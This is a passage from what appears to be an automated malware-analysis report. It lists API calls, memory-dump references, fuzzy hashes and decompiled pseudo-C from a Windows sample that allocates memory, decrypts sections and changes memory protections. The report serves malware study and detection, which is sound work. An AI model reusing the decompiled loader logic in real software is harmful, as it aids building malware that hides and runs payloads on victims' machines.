                            • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                            • String ID:
                            • API String ID: 4246211962-0
                            • Opcode ID: 53bd194f7a0fd1d050fe4c173749caa5700664f5821fdc2035c0a2de78145dd4
                            • Instruction ID: 620225c7197d0e2097ffeb394485b442cf0983e50bfba7d0fe2e9672d02f799f
                            • Opcode Fuzzy Hash: 53bd194f7a0fd1d050fe4c173749caa5700664f5821fdc2035c0a2de78145dd4
                            • Instruction Fuzzy Hash: 8451D271A0161CAFDBA5EBE4DC89B7E77B9AB04710F100426F316D7291EA709E00DB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(80000002), ref: 00CF64C3
                            • SysAllocString.OLEAUT32(00CF6843), ref: 00CF6507
                            • SysFreeString.OLEAUT32(00000000), ref: 00CF651B
                            • SysFreeString.OLEAUT32(00000000), ref: 00CF6529
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: b8a52768a01bc247f5715633658d769d184152fc777ab54b6ab63a731e7c8100
                            • Instruction ID: 12738d8fe95903880bbe1745baccdc5fd853ef174a80768b0903b7c79f0bd3b1
                            • Opcode Fuzzy Hash: b8a52768a01bc247f5715633658d769d184152fc777ab54b6ab63a731e7c8100
                            • Instruction Fuzzy Hash: A931FE75900109EFCB05DF98D9D49BE7BB9EF48300B10842EFA16EB250D731DA45CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E1000167E(void* __edi, intOrPtr _a4) {
                            				intOrPtr _v8;
                            				unsigned int _v12;
                            				intOrPtr _v16;
                            				char _v20;
                            				void* _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				void* _v36;
                            				signed int _v44;
                            				signed int _v48;
                            				intOrPtr _t39;
                            				void* _t46;
                            				intOrPtr _t47;
                            				intOrPtr _t50;
                            				signed int _t59;
                            				signed int _t61;
                            				intOrPtr _t66;
                            				intOrPtr _t77;
                            				void* _t78;
                            				signed int _t80;
                            
                            				_t77 =  *0x10004130;
                            				_t39 = E10001F20(_t77,  &_v20,  &_v12);
                            				_v16 = _t39;
                            				if(_t39 == 0) {
                            					asm("sbb ebx, ebx");
                            					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                            					_t78 = _t77 + _v20;
                            					_v36 = _t78;
                            					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                            					_v24 = _t46;
                            					if(_t46 == 0) {
                            						_v16 = 8;
                            					} else {
                            						_t61 = 0;
                            						if(_t59 <= 0) {
                            							_t47 =  *0x10004140;
                            						} else {
                            							_t66 = _a4;
                            							_t50 = _t46 - _t78;
                            							_t11 = _t66 + 0x100051a2; // 0x100051a2
                            							_v28 = _t50;
                            							_v32 = _t50 + _t11;
                            							_v8 = _t78;
                            							while(1) {
                            								asm("movsd");
                            								asm("movsd");
                            								asm("movsd");
                            								_t19 = _t61 + 1; // 0x2
                            								_t80 = _t19;
                            								E10001531(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                            								_t64 = _v32;
                            								_v8 = _v8 + 0x1000;
                            								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                            								_t61 = _t80;
                            								 *0x10004140 = _t47;
                            								if(_t61 >= _t59) {
                            									break;
                            								}
                            								_t50 = _v28;
                            							}
                            						}
                            						if(_t47 != 0x63699bc3) {
                            							_v16 = 0xc;
                            						} else {
                            							memcpy(_v36, _v24, _v12);
                            						}
                            						VirtualFree(_v24, 0, 0x8000); // executed
                            					}
                            				}
                            				return _v16;
                            			}























                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,10001A05,?,00000000,?,?,?,?,?,?,?,10001A05), ref: 100016D4
                            • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,10001A05,00000000), ref: 10001766
                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,10001A05), ref: 10001781
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: Virtual$AllocFreememcpy
                            • String ID: Dec 20 2020
                            • API String ID: 4010158826-3924289079
                            • Opcode ID: 69ab0c6b9a32fe260e2a7950d9aeabe6de4b3ad5f898016cbd094064ed0b85a9
                            • Instruction ID: a679fd416aaa6582b651e1e6bdd6db80fafe1ab0732a7248efed1bbdfeb6c3d2
                            • Opcode Fuzzy Hash: 69ab0c6b9a32fe260e2a7950d9aeabe6de4b3ad5f898016cbd094064ed0b85a9
                            • Instruction Fuzzy Hash: BB318675D0421AEFEB01CF99C881BDEB7B9FF48384F108165E904B7249D771AA45CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E00CF3231(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                            				intOrPtr _v8;
                            				void* _v12;
                            				void* _v16;
                            				intOrPtr _t26;
                            				intOrPtr* _t28;
                            				intOrPtr _t31;
                            				intOrPtr* _t32;
                            				void* _t39;
                            				int _t46;
                            				intOrPtr* _t47;
                            				int _t48;
                            
                            				_t47 = __eax;
                            				_push( &_v12);
                            				_push(__eax);
                            				_t39 = 0;
                            				_t46 = 0; // executed
                            				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                            				_v8 = _t26;
                            				if(_t26 < 0) {
                            					L13:
                            					return _v8;
                            				}
                            				if(_v12 == 0) {
                            					Sleep(0xc8);
                            					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                            				}
                            				if(_v8 >= _t39) {
                            					_t28 = _v12;
                            					if(_t28 != 0) {
                            						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                            						_v8 = _t31;
                            						if(_t31 >= 0) {
                            							_t46 = lstrlenW(_v16);
                            							if(_t46 != 0) {
                            								_t46 = _t46 + 1;
                            								_t48 = _t46 + _t46;
                            								_t39 = E00CF8D59(_t48);
                            								if(_t39 == 0) {
                            									_v8 = 0x8007000e;
                            								} else {
                            									memcpy(_t39, _v16, _t48);
                            								}
                            								__imp__#6(_v16);
                            							}
                            						}
                            						_t32 = _v12;
                            						 *((intOrPtr*)( *_t32 + 8))(_t32);
                            					}
                            					 *_a4 = _t39;
                            					 *_a8 = _t46 + _t46;
                            				}
                            				goto L13;
                            			}














                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: FreeSleepStringlstrlenmemcpy
                            • String ID:
                            • API String ID: 1198164300-0
                            • Opcode ID: c5d19b494d63a1a6412152cb1b17626877b9e71b6a0c6b8bf399ac3296f944cb
                            • Instruction ID: b75706180694b800b63354bc9943657d9e3082e0baea1736bcd7c85679e1388e
                            • Opcode Fuzzy Hash: c5d19b494d63a1a6412152cb1b17626877b9e71b6a0c6b8bf399ac3296f944cb
                            • Instruction Fuzzy Hash: 1C213E75A0020DFFCB51DFA4D988AAEBBB4FF48314B104169EA05E7211EB30DB45DB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00C814D5
                            • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00C8159F
                            • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00C816D0
                            Memory Dump Source
                            • Source File: 00000001.00000002.590451762.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false
                            Similarity
                            • API ID: Virtual$Alloc$Protect
                            • String ID:
                            • API String ID: 655996629-0
                            • Opcode ID: 1250ec620a4be35fa338938c7b5d3a0123910a051396139492b3008c14b8adba
                            • Instruction ID: 296476839ab01bf5a4222396a452fbb8a23e4ad8b8e1fbed5e3d5bb4d983546f
                            • Opcode Fuzzy Hash: 1250ec620a4be35fa338938c7b5d3a0123910a051396139492b3008c14b8adba
                            • Instruction Fuzzy Hash: 1BB1A9B4A00109DFCB48DF85C590AAEB7B5FF88304F248159E919AB345D735EE82CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CF5C8C() {
                            				void* _v8;
                            				int _v12;
                            				WCHAR* _v16;
                            				void* __edi;
                            				void* __esi;
                            				void* _t23;
                            				intOrPtr _t24;
                            				void* _t26;
                            				intOrPtr _t32;
                            				intOrPtr _t35;
                            				intOrPtr _t38;
                            				intOrPtr _t42;
                            				void* _t45;
                            				void* _t51;
                            
                            				_v12 = 0;
                            				_t23 = E00CF576C(0,  &_v8); // executed
                            				if(_t23 != 0) {
                            					_v8 = 0;
                            				}
                            				_t24 =  *0xcfd2a4; // 0x247a5a8
                            				_t4 = _t24 + 0xcfedd0; // 0x3179378
                            				_t5 = _t24 + 0xcfed78; // 0x4f0053
                            				_t26 = E00CF2AFE( &_v16, _v8, _t5, _t4); // executed
                            				_t45 = _t26;
                            				if(_t45 == 0) {
                            					StrToIntExW(_v16, 0,  &_v12);
                            					_t45 = 8;
                            					if(_v12 < _t45) {
                            						_t45 = 1;
                            						__eflags = 1;
                            					} else {
                            						_t32 =  *0xcfd2a4; // 0x247a5a8
                            						_t11 = _t32 + 0xcfedc4; // 0x317936c
                            						_t48 = _t11;
                            						_t12 = _t32 + 0xcfed78; // 0x4f0053
                            						_t51 = E00CF1FE0(_t11, _t12, _t11);
                            						_t58 = _t51;
                            						if(_t51 != 0) {
                            							_t35 =  *0xcfd2a4; // 0x247a5a8
                            							_t13 = _t35 + 0xcfee0e; // 0x30314549
                            							if(E00CF6C44(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
                            								_t60 =  *0xcfd25c - 6;
                            								if( *0xcfd25c <= 6) {
                            									_t42 =  *0xcfd2a4; // 0x247a5a8
                            									_t15 = _t42 + 0xcfec2a; // 0x52384549
                            									E00CF6C44(_t48, _t60, _v8, _t51, _t15, 0x13);
                            								}
                            							}
                            							_t38 =  *0xcfd2a4; // 0x247a5a8
                            							_t17 = _t38 + 0xcfee08; // 0x31793b0
                            							_t18 = _t38 + 0xcfede0; // 0x680043
                            							_t45 = E00CF5931(_v8, 0x80000001, _t51, _t18, _t17);
                            							HeapFree( *0xcfd238, 0, _t51);
                            						}
                            					}
                            					HeapFree( *0xcfd238, 0, _v16);
                            				}
                            				_t53 = _v8;
                            				if(_v8 != 0) {
                            					E00CF3822(_t53);
                            				}
                            				return _t45;
                            			}

















                            APIs
                            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03179378,00000000,?,74B5F710,00000000,74B5F730), ref: 00CF5CDB
                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,031793B0,?,00000000,30314549,00000014,004F0053,0317936C), ref: 00CF5D78
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00CF2885), ref: 00CF5D8A
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: c96378289a36fb18b116e23469d557e80d13f16eb86bb3eb91a6163f7521a186
                            • Instruction ID: 54cc609154d16c8dfa79715ad963e50f5edc241a0661a3872c07d717b31f92a3
                            • Opcode Fuzzy Hash: c96378289a36fb18b116e23469d557e80d13f16eb86bb3eb91a6163f7521a186
                            • Instruction Fuzzy Hash: BD318C32600508AFDB20ABA4DD88FBEBBBEEB44740B1500A5B7159B071D6709E05EB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E00CF9425(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                            				void* _v8;
                            				void* __edi;
                            				intOrPtr _t19;
                            				void* _t25;
                            				void* _t26;
                            				void* _t31;
                            				void* _t37;
                            				void* _t41;
                            				intOrPtr _t43;
                            				void* _t44;
                            
                            				_t37 = __edx;
                            				_t33 = __ecx;
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t43 =  *0xcfd2a4; // 0x247a5a8
                            				_push(0x800);
                            				_push(0);
                            				_push( *0xcfd238);
                            				_t1 = _t43 + 0xcfe791; // 0x6976612e
                            				_t44 = _t1;
                            				if( *0xcfd24c >= 5) {
                            					if(RtlAllocateHeap() == 0) {
                            						L6:
                            						_t31 = 8;
                            						L7:
                            						if(_t31 != 0) {
                            							L10:
                            							 *0xcfd24c =  *0xcfd24c + 1;
                            							L11:
                            							return _t31;
                            						}
                            						_t46 = _a4;
                            						_t41 = _v8;
                            						 *_a16 = _a4;
                            						 *_a20 = E00CF4D95(_a4, _t41); // executed
                            						_t19 = E00CF315A(_t41, _t41, _t46); // executed
                            						if(_t19 != 0) {
                            							 *_a8 = _t41;
                            							 *_a12 = _t19;
                            							if( *0xcfd24c < 5) {
                            								 *0xcfd24c =  *0xcfd24c & 0x00000000;
                            							}
                            							goto L11;
                            						}
                            						_t31 = 0xbf;
                            						E00CF5BEA();
                            						RtlFreeHeap( *0xcfd238, 0, _t41); // executed
                            						goto L10;
                            					}
                            					_t25 = E00CF1D4C(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
                            					L5:
                            					_t31 = _t25;
                            					goto L7;
                            				}
                            				_t26 = RtlAllocateHeap(); // executed
                            				if(_t26 == 0) {
                            					goto L6;
                            				}
                            				_t25 = E00CF12C4(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
                            				goto L5;
                            			}














                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 00CF944F
                              • Part of subcall function 00CF12C4: GetTickCount.KERNEL32 ref: 00CF12D8
                              • Part of subcall function 00CF12C4: wsprintfA.USER32 ref: 00CF1328
                              • Part of subcall function 00CF12C4: wsprintfA.USER32 ref: 00CF1345
                              • Part of subcall function 00CF12C4: wsprintfA.USER32 ref: 00CF1371
                              • Part of subcall function 00CF12C4: HeapFree.KERNEL32(00000000,?), ref: 00CF1383
                              • Part of subcall function 00CF12C4: wsprintfA.USER32 ref: 00CF13A4
                              • Part of subcall function 00CF12C4: HeapFree.KERNEL32(00000000,?), ref: 00CF13B4
                              • Part of subcall function 00CF12C4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00CF13E2
                              • Part of subcall function 00CF12C4: GetTickCount.KERNEL32 ref: 00CF13F3
                            • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 00CF946D
                            • RtlFreeHeap.NTDLL(00000000,00000002,00CF28D0,?,00CF28D0,00000002,?,?,00CF50A1,?), ref: 00CF94CA
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Heap$wsprintf$AllocateFree$CountTick
                            • String ID:
                            • API String ID: 1676223858-0
                            • Opcode ID: bb0a3cbe6d9fb190b428cec6bccfb56fdec8b5026c8f013da81f7aa62b5e21d2
                            • Instruction ID: 146769582aadc5cff07421bc9a2c6ed3d672a408fd5ba092ada4d788bfcdfbb0
                            • Opcode Fuzzy Hash: bb0a3cbe6d9fb190b428cec6bccfb56fdec8b5026c8f013da81f7aa62b5e21d2
                            • Instruction Fuzzy Hash: 28213976600208EBCB519F59DC44FBE3BADEB55345F104026FA029B261DB70EA06DBA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E100015BC(void* __eax, void* _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				long _v16;
                            				signed int _v20;
                            				signed int _t31;
                            				long _t33;
                            				int _t34;
                            				signed int _t35;
                            				signed int _t42;
                            				void* _t50;
                            				void* _t51;
                            				signed int _t54;
                            
                            				_v12 = _v12 & 0x00000000;
                            				_t42 =  *(__eax + 6) & 0x0000ffff;
                            				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                            				_v20 = _t42;
                            				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
                            				_v8 = _v8 & 0x00000000;
                            				if(_t42 <= 0) {
                            					L11:
                            					return _v12;
                            				}
                            				_t51 = _t50 + 0x24;
                            				while(1) {
                            					_t54 = _v12;
                            					if(_t54 != 0) {
                            						goto L11;
                            					}
                            					asm("bt dword [esi], 0x1d");
                            					if(_t54 >= 0) {
                            						asm("bt dword [esi], 0x1e");
                            						if(__eflags >= 0) {
                            							_t33 = 4;
                            						} else {
                            							asm("bt dword [esi], 0x1f");
                            							_t35 = 0;
                            							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
                            						}
                            					} else {
                            						asm("bt dword [esi], 0x1f");
                            						asm("sbb eax, eax");
                            						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
                            					}
                            					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
                            					if(_t34 == 0) {
                            						_v12 = GetLastError();
                            					}
                            					_t51 = _t51 + 0x28;
                            					_v8 = _v8 + 1;
                            					_t31 = _v8;
                            					if(_t31 < _v20) {
                            						continue;
                            					} else {
                            						goto L11;
                            					}
                            				}
                            				goto L11;
                            			}
















                            APIs
                            • VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 100015EA
                            • VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 10001642
                            • GetLastError.KERNEL32 ref: 10001648
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: ProtectVirtual$ErrorLast
                            • String ID:
                            • API String ID: 1469625949-0
                            • Opcode ID: 83e6e04bcd366fded1c35c8b269c89bea0f76d85a8c834e0f0ae9599731ac213
                            • Instruction ID: 1caff0e5d2961c318858f6bb2b0d7f99fceebbb811b198e9e8c3a8d3f04173f9
                            • Opcode Fuzzy Hash: 83e6e04bcd366fded1c35c8b269c89bea0f76d85a8c834e0f0ae9599731ac213
                            • Instruction Fuzzy Hash: 762190B2900209EFEB20CF94CC95FEDB7F9FB04395F254499E6409B146D3759A85CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E1000133E() {
                            				char _v16;
                            				intOrPtr _v28;
                            				void _v32;
                            				void* _v36;
                            				intOrPtr _t15;
                            				void* _t16;
                            				long _t25;
                            				int _t26;
                            				intOrPtr _t30;
                            				void* _t32;
                            				signed int _t35;
                            				intOrPtr* _t37;
                            				intOrPtr _t39;
                            				int _t44;
                            
                            				_t15 =  *0x10004144;
                            				if( *0x1000412c > 5) {
                            					_t16 = _t15 + 0x100050f4;
                            				} else {
                            					_t16 = _t15 + 0x100050b1;
                            				}
                            				E10001B3D(_t16, _t16);
                            				_t35 = 6;
                            				memset( &_v32, 0, _t35 << 2);
                            				if(E1000140B( &_v32,  &_v16,  *0x10004140 ^ 0xfd7cd1cf) == 0) {
                            					_t25 = 0xb;
                            				} else {
                            					_t26 = lstrlenW( *0x10004138);
                            					_t8 = _t26 + 2; // 0x2
                            					_t44 = _t26 + _t8;
                            					_t11 = _t44 + 8; // 0xa
                            					_t30 = E10001266(_t39, _t11,  &_v32,  &_v36); // executed
                            					if(_t30 == 0) {
                            						_t37 = _v36;
                            						 *_t37 = _t30;
                            						_t32 =  *0x10004138;
                            						if(_t32 == 0) {
                            							 *(_t37 + 4) = 0;
                            						} else {
                            							memcpy(_t37 + 4, _t32, _t44);
                            						}
                            					}
                            					_t25 = E10001E8D(_v28); // executed
                            				}
                            				ExitThread(_t25);
                            			}


















                            APIs
                            • lstrlenW.KERNEL32(?,?,?,?), ref: 1000139A
                            • memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 100013D0
                            • ExitThread.KERNEL32 ref: 100013EF
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: ExitThreadlstrlenmemcpy
                            • String ID:
                            • API String ID: 3726537860-0
                            • Opcode ID: e02dfd363db0967d0870aff3b157c598f88e346b5e58301aa368e4c84523a345
                            • Instruction ID: 3896a0d8cea4ba724126f95b9eff81958b59e96603957c53bc3dc28b2077132e
                            • Opcode Fuzzy Hash: e02dfd363db0967d0870aff3b157c598f88e346b5e58301aa368e4c84523a345
                            • Instruction Fuzzy Hash: BC118B71104305ABF721DBA1CD84ECBB7ECEB443C0F02482AF504D75A9EB20E6448B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E00CF4A32(void* __eflags, int _a4) {
                            				intOrPtr _v12;
                            				WCHAR* _v16;
                            				char* _v20;
                            				int _v24;
                            				void* _v36;
                            				char _v40;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				char _v80;
                            				void _v84;
                            				char _v88;
                            				void* __ebx;
                            				void* __esi;
                            				intOrPtr _t40;
                            				int _t45;
                            				intOrPtr _t50;
                            				intOrPtr _t52;
                            				void* _t55;
                            				intOrPtr _t67;
                            				void* _t70;
                            				void* _t80;
                            				WCHAR* _t85;
                            
                            				_v88 = 0;
                            				memset( &_v84, 0, 0x2c);
                            				_v40 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t40 =  *0xcfd2a4; // 0x247a5a8
                            				_t5 = _t40 + 0xcfee34; // 0x410025
                            				_t85 = E00CFA822(_t5);
                            				_v16 = _t85;
                            				if(_t85 == 0) {
                            					_t80 = 8;
                            					L24:
                            					return _t80;
                            				}
                            				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
                            				if(_t45 != 0) {
                            					_t80 = 1;
                            					L22:
                            					E00CF677C(_v16);
                            					goto L24;
                            				}
                            				if(E00CF576C(0,  &_a4) != 0) {
                            					_a4 = 0;
                            				}
                            				_t50 = E00CF978C(0,  *0xcfd33c);
                            				_v12 = _t50;
                            				if(_t50 == 0) {
                            					_t80 = 8;
                            					goto L19;
                            				} else {
                            					_t52 =  *0xcfd2a4; // 0x247a5a8
                            					_t11 = _t52 + 0xcfe81a; // 0x65696c43
                            					_t55 = E00CF978C(0, _t11);
                            					_t87 = _t55;
                            					if(_t55 == 0) {
                            						_t80 = 8;
                            					} else {
                            						_t80 = E00CF63A4(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
                            						E00CF677C(_t87);
                            					}
                            					if(_t80 != 0) {
                            						L17:
                            						E00CF677C(_v12);
                            						L19:
                            						_t86 = _a4;
                            						if(_a4 != 0) {
                            							E00CF3822(_t86);
                            						}
                            						goto L22;
                            					} else {
                            						if(( *0xcfd260 & 0x00000001) == 0) {
                            							L14:
                            							E00CF4E42(_t80, _v88, _v84,  *0xcfd270, 0);
                            							_t80 = E00CF10AB(_v88,  &_v80,  &_v76, 0);
                            							if(_t80 == 0) {
                            								_v24 = _a4;
                            								_v20 =  &_v88;
                            								_t80 = E00CF2997( &_v40, 0);
                            							}
                            							E00CF677C(_v88);
                            							goto L17;
                            						}
                            						_t67 =  *0xcfd2a4; // 0x247a5a8
                            						_t18 = _t67 + 0xcfe823; // 0x65696c43
                            						_t70 = E00CF978C(0, _t18);
                            						_t89 = _t70;
                            						if(_t70 == 0) {
                            							_t80 = 8;
                            						} else {
                            							_t80 = E00CF63A4(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
                            							E00CF677C(_t89);
                            						}
                            						if(_t80 != 0) {
                            							goto L17;
                            						} else {
                            							goto L14;
                            						}
                            					}
                            				}
                            			}



























                            APIs
                            • memset.NTDLL ref: 00CF4A47
                              • Part of subcall function 00CFA822: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00CF4A6D,00410025,00000005,?,00000000), ref: 00CFA833
                              • Part of subcall function 00CFA822: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00CFA850
                            • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00CF4A7B
                            • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00CF4A86
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: EnvironmentExpandStrings$lstrlenmemset
                            • String ID:
                            • API String ID: 3817122888-0
                            • Opcode ID: 6172de931bbff71986e9d949c70bb9e50cec8f8b7ace753e13db82c4537878a7
                            • Instruction ID: 616609fb2c9bfc6644fb7df9e67a06ba22db33fd888444e02999f5d260393661
                            • Opcode Fuzzy Hash: 6172de931bbff71986e9d949c70bb9e50cec8f8b7ace753e13db82c4537878a7
                            • Instruction Fuzzy Hash: 53413B7290061DAFDB95AFE4CC85EFFBBBDAF08344B104066BB01A7112D675DE049792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E00CF8F16(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                            				void* _v8;
                            				void* __esi;
                            				intOrPtr* _t35;
                            				void* _t40;
                            				intOrPtr* _t41;
                            				intOrPtr* _t43;
                            				intOrPtr* _t45;
                            				intOrPtr* _t50;
                            				intOrPtr* _t52;
                            				void* _t54;
                            				intOrPtr* _t55;
                            				intOrPtr* _t57;
                            				intOrPtr* _t61;
                            				intOrPtr* _t65;
                            				intOrPtr _t68;
                            				void* _t72;
                            				void* _t75;
                            				void* _t76;
                            
                            				_t55 = _a4;
                            				_t35 =  *((intOrPtr*)(_t55 + 4));
                            				_a4 = 0;
                            				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                            				if(_t76 < 0) {
                            					L18:
                            					return _t76;
                            				}
                            				_t40 = E00CF6466(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                            				_t76 = _t40;
                            				if(_t76 >= 0) {
                            					_t61 = _a28;
                            					if(_t61 != 0 &&  *_t61 != 0) {
                            						_t52 = _v8;
                            						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                            					}
                            					if(_t76 >= 0) {
                            						_t43 =  *_t55;
                            						_t68 =  *0xcfd2a4; // 0x247a5a8
                            						_t20 = _t68 + 0xcfe1fc; // 0x740053
                            						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                            						if(_t76 >= 0) {
                            							_t76 = E00CF92F3(_a4);
                            							if(_t76 >= 0) {
                            								_t65 = _a28;
                            								if(_t65 != 0 &&  *_t65 == 0) {
                            									_t50 = _a4;
                            									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                            								}
                            							}
                            						}
                            						_t45 = _a4;
                            						if(_t45 != 0) {
                            							 *((intOrPtr*)( *_t45 + 8))(_t45);
                            						}
                            						_t57 = __imp__#6;
                            						if(_a20 != 0) {
                            							 *_t57(_a20);
                            						}
                            						if(_a12 != 0) {
                            							 *_t57(_a12);
                            						}
                            					}
                            				}
                            				_t41 = _v8;
                            				 *((intOrPtr*)( *_t41 + 8))(_t41);
                            				goto L18;
